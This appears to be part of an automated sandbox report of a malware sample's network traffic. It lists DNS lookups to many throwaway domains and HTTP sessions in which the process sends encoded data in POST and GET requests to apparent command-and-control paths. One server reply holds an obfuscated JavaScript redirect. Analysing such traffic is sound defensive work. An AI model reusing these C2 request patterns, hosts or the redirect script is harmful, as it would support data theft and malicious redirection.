                                                                                Dec 14, 2024 13:53:22.487066031 CET805006081.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:22.487121105 CET5006080192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:22.721930027 CET5006080192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:23.738409042 CET5006180192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:23.858171940 CET805006181.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:23.858305931 CET5006180192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:23.879235983 CET5006180192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:23.999423981 CET805006181.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:25.151479959 CET805006181.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:25.151505947 CET805006181.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:25.152050972 CET5006180192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:25.390845060 CET5006180192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:26.768907070 CET5006280192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:26.891758919 CET805006281.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:26.892473936 CET5006280192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:26.907990932 CET5006280192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:27.027950048 CET805006281.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:27.027981043 CET805006281.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:28.184179068 CET805006281.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:28.184218884 CET805006281.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:28.184283018 CET5006280192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:28.421974897 CET5006280192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:29.442137003 CET5006380192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:29.563308954 CET805006381.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:29.563500881 CET5006380192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:29.578210115 CET5006380192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:29.698788881 CET805006381.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:30.855499983 CET805006381.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:30.855622053 CET805006381.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:30.855901003 CET5006380192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:30.858270884 CET5006380192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:30.978265047 CET805006381.2.196.19192.168.2.5

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Dec 14, 2024 13:49:58.402311087 CET5433753192.168.2.51.1.1.1
                                                                                Dec 14, 2024 13:49:59.194586992 CET53543371.1.1.1192.168.2.5
                                                                                Dec 14, 2024 13:50:15.969619989 CET5154253192.168.2.51.1.1.1
                                                                                Dec 14, 2024 13:50:16.918570042 CET53515421.1.1.1192.168.2.5
                                                                                Dec 14, 2024 13:50:31.644737959 CET4969753192.168.2.51.1.1.1
                                                                                Dec 14, 2024 13:50:31.966650963 CET53496971.1.1.1192.168.2.5
                                                                                Dec 14, 2024 13:50:46.379396915 CET5123153192.168.2.51.1.1.1
                                                                                Dec 14, 2024 13:50:47.173177958 CET53512311.1.1.1192.168.2.5
                                                                                Dec 14, 2024 13:51:02.191291094 CET6278253192.168.2.51.1.1.1
                                                                                Dec 14, 2024 13:51:02.949561119 CET53627821.1.1.1192.168.2.5
                                                                                Dec 14, 2024 13:51:17.903724909 CET5125153192.168.2.51.1.1.1
                                                                                Dec 14, 2024 13:51:18.409284115 CET53512511.1.1.1192.168.2.5
                                                                                Dec 14, 2024 13:51:32.660362005 CET6014053192.168.2.51.1.1.1
                                                                                Dec 14, 2024 13:51:33.675199986 CET6014053192.168.2.51.1.1.1
                                                                                Dec 14, 2024 13:51:33.920608997 CET53601401.1.1.1192.168.2.5
                                                                                Dec 14, 2024 13:51:33.920681000 CET53601401.1.1.1192.168.2.5
                                                                                Dec 14, 2024 13:51:49.693758965 CET5418053192.168.2.51.1.1.1
                                                                                Dec 14, 2024 13:51:50.328896999 CET53541801.1.1.1192.168.2.5
                                                                                Dec 14, 2024 13:52:04.926400900 CET5090353192.168.2.51.1.1.1
                                                                                Dec 14, 2024 13:52:05.927736998 CET5090353192.168.2.51.1.1.1
                                                                                Dec 14, 2024 13:52:06.109617949 CET53509031.1.1.1192.168.2.5
                                                                                Dec 14, 2024 13:52:06.109637976 CET53509031.1.1.1192.168.2.5
                                                                                Dec 14, 2024 13:52:21.005800009 CET5396153192.168.2.51.1.1.1
                                                                                Dec 14, 2024 13:52:21.568890095 CET53539611.1.1.1192.168.2.5
                                                                                Dec 14, 2024 13:52:35.841672897 CET6449153192.168.2.51.1.1.1
                                                                                Dec 14, 2024 13:52:36.147614002 CET53644911.1.1.1192.168.2.5
                                                                                Dec 14, 2024 13:52:50.566529036 CET5060853192.168.2.51.1.1.1
                                                                                Dec 14, 2024 13:52:50.891206980 CET53506081.1.1.1192.168.2.5
                                                                                Dec 14, 2024 13:53:05.379093885 CET6202553192.168.2.51.1.1.1
                                                                                Dec 14, 2024 13:53:05.961961985 CET53620251.1.1.1192.168.2.5
                                                                                Dec 14, 2024 13:53:20.443264961 CET5380853192.168.2.51.1.1.1
                                                                                Dec 14, 2024 13:53:21.066670895 CET53538081.1.1.1192.168.2.5

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Dec 14, 2024 13:49:58.402311087 CET192.168.2.51.1.1.10x128dStandard query (0)www.7261ltajbc.bondA (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:50:15.969619989 CET192.168.2.51.1.1.10x66b9Standard query (0)www.muasamgiare.clickA (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:50:31.644737959 CET192.168.2.51.1.1.10xf04Standard query (0)www.kkpmoneysocial.topA (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:50:46.379396915 CET192.168.2.51.1.1.10xdc37Standard query (0)www.artkub.netA (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:51:02.191291094 CET192.168.2.51.1.1.10xd43dStandard query (0)www.happyjam.lifeA (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:51:17.903724909 CET192.168.2.51.1.1.10x965aStandard query (0)www.123hellodrive.shopA (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:51:32.660362005 CET192.168.2.51.1.1.10x52bcStandard query (0)www.zoomlive.liveA (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:51:33.675199986 CET192.168.2.51.1.1.10x52bcStandard query (0)www.zoomlive.liveA (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:51:49.693758965 CET192.168.2.51.1.1.10x62e9Standard query (0)www.dietcoffee.onlineA (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:52:04.926400900 CET192.168.2.51.1.1.10xb008Standard query (0)www.guacamask.onlineA (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:52:05.927736998 CET192.168.2.51.1.1.10xb008Standard query (0)www.guacamask.onlineA (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:52:21.005800009 CET192.168.2.51.1.1.10x94edStandard query (0)www.appsolucao.shopA (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:52:35.841672897 CET192.168.2.51.1.1.10xf186Standard query (0)www.aziziyeescortg.xyzA (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:52:50.566529036 CET192.168.2.51.1.1.10x5071Standard query (0)www.supernutra01.onlineA (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:53:05.379093885 CET192.168.2.51.1.1.10xf3d1Standard query (0)www.54248711.xyzA (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:53:20.443264961 CET192.168.2.51.1.1.10x499dStandard query (0)www.bagatowcannabis.cloudA (IP address)IN (0x0001)false

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Dec 14, 2024 13:49:59.194586992 CET1.1.1.1192.168.2.50x128dNo error (0)www.7261ltajbc.bond154.12.28.184A (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:50:16.918570042 CET1.1.1.1192.168.2.50x66b9No error (0)www.muasamgiare.clickdns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 14, 2024 13:50:16.918570042 CET1.1.1.1192.168.2.50x66b9No error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:50:16.918570042 CET1.1.1.1192.168.2.50x66b9No error (0)dns.ladipage.com54.179.173.60A (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:50:16.918570042 CET1.1.1.1192.168.2.50x66b9No error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:50:31.966650963 CET1.1.1.1192.168.2.50xf04No error (0)www.kkpmoneysocial.top172.67.129.38A (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:50:31.966650963 CET1.1.1.1192.168.2.50xf04No error (0)www.kkpmoneysocial.top104.21.1.106A (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:50:47.173177958 CET1.1.1.1192.168.2.50xdc37No error (0)www.artkub.net185.42.14.166A (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:51:02.949561119 CET1.1.1.1192.168.2.50xd43dNo error (0)www.happyjam.life209.74.77.107A (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:51:18.409284115 CET1.1.1.1192.168.2.50x965aNo error (0)www.123hellodrive.shop123hellodrive.shopCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 14, 2024 13:51:18.409284115 CET1.1.1.1192.168.2.50x965aNo error (0)123hellodrive.shop84.32.84.32A (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:51:33.920608997 CET1.1.1.1192.168.2.50x52bcNo error (0)www.zoomlive.live154.208.202.225A (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:51:33.920681000 CET1.1.1.1192.168.2.50x52bcNo error (0)www.zoomlive.live154.208.202.225A (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:51:50.328896999 CET1.1.1.1192.168.2.50x62e9No error (0)www.dietcoffee.online77.68.64.45A (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:52:06.109617949 CET1.1.1.1192.168.2.50xb008No error (0)www.guacamask.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:52:06.109637976 CET1.1.1.1192.168.2.50xb008No error (0)www.guacamask.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:52:21.568890095 CET1.1.1.1192.168.2.50x94edNo error (0)www.appsolucao.shopappsolucao.shopCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 14, 2024 13:52:21.568890095 CET1.1.1.1192.168.2.50x94edNo error (0)appsolucao.shop84.32.84.32A (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:52:36.147614002 CET1.1.1.1192.168.2.50xf186No error (0)www.aziziyeescortg.xyz104.21.77.71A (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:52:36.147614002 CET1.1.1.1192.168.2.50xf186No error (0)www.aziziyeescortg.xyz172.67.205.93A (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:52:50.891206980 CET1.1.1.1192.168.2.50x5071No error (0)www.supernutra01.online172.67.220.36A (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:52:50.891206980 CET1.1.1.1192.168.2.50x5071No error (0)www.supernutra01.online104.21.24.198A (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:53:05.961961985 CET1.1.1.1192.168.2.50xf3d1No error (0)www.54248711.xyz54248711.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 14, 2024 13:53:05.961961985 CET1.1.1.1192.168.2.50xf3d1No error (0)54248711.xyz162.0.217.35A (IP address)IN (0x0001)false
                                                                                Dec 14, 2024 13:53:21.066670895 CET1.1.1.1192.168.2.50x499dNo error (0)www.bagatowcannabis.cloudbagatowcannabis.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 14, 2024 13:53:21.066670895 CET1.1.1.1192.168.2.50x499dNo error (0)bagatowcannabis.cloud81.2.196.19A (IP address)IN (0x0001)false

                                                                                HTTP Request Dependency Graph

                                                                                • www.7261ltajbc.bond
                                                                                • www.muasamgiare.click
                                                                                • www.kkpmoneysocial.top
                                                                                • www.artkub.net
                                                                                • www.happyjam.life
                                                                                • www.123hellodrive.shop
                                                                                • www.zoomlive.live
                                                                                • www.dietcoffee.online
                                                                                • www.guacamask.online
                                                                                • www.appsolucao.shop
                                                                                • www.aziziyeescortg.xyz
                                                                                • www.supernutra01.online
                                                                                • www.54248711.xyz
                                                                                • www.bagatowcannabis.cloud

                                                                                HTTP Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.549801154.12.28.184806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:49:59.332856894 CET484OUTGET /vt4e/?NVK8=VWo59DE7z/zpNvlQrGwQqnlKKikmhHzFU/awM9upW87Yx15oShf3plLjnAS2lxJKaRtg2RYIywQ4d8OifO+R6Wiy9G2ixVXSMqx2pS2jo8Wgf7OcwrfnpeCilt1Zi3OUog==&V6T=lB24KzN0lF-8 HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.7261ltajbc.bond
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Dec 14, 2024 13:50:00.870424986 CET858INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Sat, 14 Dec 2024 12:50:00 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Data Raw: 32 39 39 0d 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 34 61 65 65 66 39 33 33 64 63 32 33 34 38 37 38 64 38 34 64 31 31 32 33 61 65 38 65 61 62 39 66 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 68 6d 2c 20 73 29 3b 0a 7d 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 31 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 [TRUNCATED]
                                                                                Data Ascii: 299<script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?4aeef933dc234878d84d1123ae8eab9f"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script>...1--><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"KQ2cxFS69unN6J8D",ck:"KQ2cxFS69unN6J8D"})</script><script> var url = "https://lameo.nrkeiu.tdvgb.cn/123.html"; var _0x0 = ["\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x68\x72\x65\x66"]; setTimeout(function() { window[_0x0[0]][_0x0[1]] = url; }, 0);</script>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.54984313.228.81.39806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:50:17.064775944 CET752OUTPOST /bsye/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.muasamgiare.click
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Origin: http://www.muasamgiare.click
                                                                                Referer: http://www.muasamgiare.click/bsye/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 72 65 50 77 37 6d 4a 50 72 72 43 43 4b 57 55 2f 4e 7a 4e 49 41 6a 69 41 6f 6d 6a 5a 31 73 64 4b 41 45 79 49 51 58 79 35 4f 43 75 76 75 59 30 6f 62 46 46 45 61 46 6d 6e 69 7a 61 33 70 48 39 58 72 6f 4d 48 39 57 65 7a 59 73 58 48 74 5a 63 46 56 78 2b 38 63 7a 38 68 4f 31 71 46 6d 7a 41 58 6c 61 38 74 59 64 59 68 4e 73 66 6c 70 64 35 73 36 6b 42 56 71 35 68 4e 78 68 52 53 45 51 63 34 30 6c 4b 36 4a 6f 73 38 50 77 6a 65 66 50 42 6a 4e 46 78 4e 33 34 43 4d 37 48 32 78 71 6d 43 4b 34 6c 43 69 4a 38 4c 2b 46 46 49 68 4b 50 4c 49 77 62 33 65 49 70 33 69 4a 61 35 51 4a 45 4b 63 52 51 6b 78 6b 52 38 3d
                                                                                Data Ascii: NVK8=rePw7mJPrrCCKWU/NzNIAjiAomjZ1sdKAEyIQXy5OCuvuY0obFFEaFmniza3pH9XroMH9WezYsXHtZcFVx+8cz8hO1qFmzAXla8tYdYhNsflpd5s6kBVq5hNxhRSEQc40lK6Jos8PwjefPBjNFxN34CM7H2xqmCK4lCiJ8L+FFIhKPLIwb3eIp3iJa5QJEKcRQkxkR8=
                                                                                Dec 14, 2024 13:50:18.630604982 CET368INHTTP/1.1 301 Moved Permanently
                                                                                Server: openresty
                                                                                Date: Sat, 14 Dec 2024 12:50:18 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 166
                                                                                Connection: close
                                                                                Location: https://www.muasamgiare.click/bsye/
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.54984913.228.81.39806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:50:19.732862949 CET772OUTPOST /bsye/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.muasamgiare.click
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Origin: http://www.muasamgiare.click
                                                                                Referer: http://www.muasamgiare.click/bsye/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 72 65 50 77 37 6d 4a 50 72 72 43 43 59 6d 45 2f 4c 53 4e 49 49 6a 69 50 6e 47 6a 5a 2f 4d 64 52 41 45 4f 49 51 57 32 70 4f 30 32 76 75 35 45 6f 61 45 46 45 5a 46 6d 6e 71 54 61 79 6e 6e 39 51 72 6f 52 34 39 58 79 7a 59 73 72 48 74 62 55 46 56 6d 71 37 4f 54 38 6a 48 56 72 6a 37 6a 41 58 6c 61 38 74 59 64 4d 48 4e 73 48 6c 70 74 4a 73 37 42 31 57 6d 5a 68 4f 6e 78 52 53 41 51 63 30 30 6c 4c 76 4a 70 67 43 50 79 72 65 66 4f 78 6a 4d 58 5a 4d 69 49 43 4b 6b 58 33 67 73 55 6a 37 69 33 65 35 41 73 6d 67 47 56 45 38 50 35 36 69 71 35 2f 32 62 4a 62 61 5a 4a 78 6e 59 30 72 31 4c 7a 30 42 36 47 72 37 4d 4f 30 57 31 6d 59 61 77 44 43 45 34 71 49 54 6a 69 57 67
                                                                                Data Ascii: NVK8=rePw7mJPrrCCYmE/LSNIIjiPnGjZ/MdRAEOIQW2pO02vu5EoaEFEZFmnqTaynn9QroR49XyzYsrHtbUFVmq7OT8jHVrj7jAXla8tYdMHNsHlptJs7B1WmZhOnxRSAQc00lLvJpgCPyrefOxjMXZMiICKkX3gsUj7i3e5AsmgGVE8P56iq5/2bJbaZJxnY0r1Lz0B6Gr7MO0W1mYawDCE4qITjiWg
                                                                                Dec 14, 2024 13:50:21.308003902 CET368INHTTP/1.1 301 Moved Permanently
                                                                                Server: openresty
                                                                                Date: Sat, 14 Dec 2024 12:50:21 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 166
                                                                                Connection: close
                                                                                Location: https://www.muasamgiare.click/bsye/
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.54985913.228.81.39806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:50:22.392061949 CET1789OUTPOST /bsye/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.muasamgiare.click
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Origin: http://www.muasamgiare.click
                                                                                Referer: http://www.muasamgiare.click/bsye/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 72 65 50 77 37 6d 4a 50 72 72 43 43 59 6d 45 2f 4c 53 4e 49 49 6a 69 50 6e 47 6a 5a 2f 4d 64 52 41 45 4f 49 51 57 32 70 4f 30 4f 76 70 50 59 6f 63 6e 39 45 59 46 6d 6e 67 7a 61 7a 6e 6e 38 4d 72 6f 4a 30 39 58 75 4a 59 70 76 48 73 2b 41 46 41 6a 47 37 58 6a 38 6a 59 46 72 33 6d 7a 41 47 6c 61 74 46 59 64 63 48 4e 73 48 6c 70 72 46 73 38 55 42 57 67 5a 68 4e 78 68 52 65 45 51 64 72 30 68 65 59 4a 70 6b 53 50 47 66 65 66 75 68 6a 42 43 46 4d 2b 59 43 49 6e 58 33 34 73 55 76 67 69 33 43 39 41 75 47 47 47 57 6b 38 4f 66 33 43 35 4c 33 63 50 35 4c 37 56 71 4e 68 50 7a 7a 4c 4a 41 51 77 6d 33 7a 2b 45 74 63 36 32 44 55 70 6c 43 33 32 74 37 63 4c 7a 69 76 73 69 51 61 67 2b 34 46 78 31 6e 6b 65 7a 58 72 75 6f 35 62 32 33 38 59 5a 6d 42 79 34 72 71 78 66 62 4f 56 74 35 6a 39 4d 57 64 37 2f 30 2f 74 76 75 66 4c 38 79 79 4a 63 6e 71 76 6a 53 33 7a 49 35 54 7a 36 49 69 56 66 65 4c 75 69 52 79 67 4e 62 43 41 67 4d 2f 37 77 6a 2f 74 71 4a 31 36 41 59 54 6d 65 77 7a 69 30 67 64 79 37 4d 34 79 4c 4a [TRUNCATED]
                                                                                Data Ascii: NVK8=rePw7mJPrrCCYmE/LSNIIjiPnGjZ/MdRAEOIQW2pO0OvpPYocn9EYFmngzaznn8MroJ09XuJYpvHs+AFAjG7Xj8jYFr3mzAGlatFYdcHNsHlprFs8UBWgZhNxhReEQdr0heYJpkSPGfefuhjBCFM+YCInX34sUvgi3C9AuGGGWk8Of3C5L3cP5L7VqNhPzzLJAQwm3z+Etc62DUplC32t7cLzivsiQag+4Fx1nkezXruo5b238YZmBy4rqxfbOVt5j9MWd7/0/tvufL8yyJcnqvjS3zI5Tz6IiVfeLuiRygNbCAgM/7wj/tqJ16AYTmewzi0gdy7M4yLJ/kElIRo5Uvr002uOwZNIdXEJVk8NGyjp5/utGEfEJWkgGOpXFb+B5tgm/7CZb0b3/RIws2aR3Q1ljAHvdIau7YWBTb/Gjr4z3Nm00AtW1RHe9Is3mn/SYnSN2bybluoXSwtR7reLKtFWbJivn+/370V3o4mBsGVCKmQAxRpDegKjiNBW07niffet9SGynY4IZVcFiCYvQpPRFlxq0Z+5sIwaFZBPX3d+MmyorC6CsGM9CkNDxJnqYv4xPQP+zlSTXk0IOqx2IwVDsrpo3J/Q5xAdM6T4cfoko3RNLBcYObiUWiL5FhgnHMWI7MOLzfdMfUcwa0rkfURoE1woEv9Xf3/e5OGbbMezmvRIsppzGlju6I6vZpFlDa2wgQkMByR3fhmM//BNfXjH/0DfOdcI+tgZuHQxh+WKq3pabnoR+/+7R4GSdIXXOs3aPF+MC7Ygltws0v3BJ4OlrUI8nbfA7d5m+DdX/AC7ve4jBdq1Ky+tnUsasUVe7+G33rQ2/5962ivFHbwwxbLxbeB3FtGk9gQ1VSNZvN9S6dv74dGOSvw/nWz8KCQqolCwHVGKnLikD5CCBi9buYizozEFuaFWLNM64qkw67S/iSdLuVWT6Ti6d9pzAlrAO/V8TE7w5OuLAzgIjbtQOW2kqtSklcQwxQgVLAkpdz7B/8 [TRUNCATED]
                                                                                Dec 14, 2024 13:50:24.187650919 CET368INHTTP/1.1 301 Moved Permanently
                                                                                Server: openresty
                                                                                Date: Sat, 14 Dec 2024 12:50:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 166
                                                                                Connection: close
                                                                                Location: https://www.muasamgiare.click/bsye/
